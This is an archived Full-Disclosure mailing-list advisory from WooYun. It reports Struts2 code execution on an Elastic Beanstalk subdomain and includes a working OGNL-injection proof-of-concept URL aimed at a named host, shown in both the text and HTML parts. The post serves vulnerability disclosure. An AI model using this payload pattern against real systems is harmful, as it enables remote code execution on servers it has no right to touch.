[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
From: "Wooyun.org" <help.en () wooyun ! org>
Date: 2013-12-26 14:52:43
Message-ID: CAPQ_=KX2g4e4_vBRj9BWt1nWfOihyZrzV3T7FqkuJN98iZL9fQ () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
*Form:*http://en.wooyun.org/bugs/wooyun-2013-040
*Abstract£º*
AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
manage applications in the AWS cloud. elasticbeanstalk subdomain exists
Struts2 code execution .
*Details£º*
poc return [/ok]:
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensy \
mphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}
--
WooYun, an Open and Free Vulnerability Reporting Platform
For more information, please visit http://en.wooyun.org/about.php
[Attachment #5 (text/html)]
<div dir="ltr"><div><b style="font-family:arial,sans-serif;font-size:14px">Form:</b><a \
href="http://en.wooyun.org/bugs/wooyun-2013-040">http://en.wooyun.org/bugs/wooyun-2013-040</a></div><div><br></div><b \
style="font-family:arial,sans-serif;font-size:14px"><div> <b \
style="font-family:arial,sans-serif;font-size:14px"><br></b></div>Abstract£º</b><br \
style="font-family:arial,sans-serif;font-size:14px"><br \
style="font-family:arial,sans-serif;font-size:14px"><font face="arial, sans-serif"><span \
style="font-size:14px">AWS Elastic Beanstalk is an even easier way for you to quickly deploy \
and manage applications in the AWS cloud. elasticbeanstalk subdomain exists Struts2 code \
execution .</span></font><br style="font-family:arial,sans-serif;font-size:14px"> <br \
style="font-family:arial,sans-serif;font-size:14px"><b \
style="font-family:arial,sans-serif;font-size:14px">Details£º</b><br \
style="font-family:arial,sans-serif;font-size:14px"><br \
style="font-family:arial,sans-serif;font-size:14px"> <span \
style="color:rgb(0,0,0);font-family:Verdana,'Microsoft \
YaHei',Helvetica,Arial,sans-serif;font-size:13px;line-height:25px">poc return \
[/ok]:</span><div><font color="#000000" face="Verdana, Microsoft YaHei, Helvetica, Arial, \
sans-serif"><span style="line-height:25px"><a \
href="http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get(' \
com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok] \
'),%23w.flush(),%23w.close()}">http://jewelopoly.elasticbeanstalk.com/login.action?redirect: \
${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWri \
ter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}</a></span></font><br> <div><font \
face="arial, sans-serif"><span style="font-size:14px"><b><br></b></span></font>-- <br>WooYun, \
an Open and Free Vulnerability Reporting Platform<br><br>For more information, please visit <a \
href="http://en.wooyun.org/about.php">http://en.wooyun.org/about.php</a></div> </div></div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic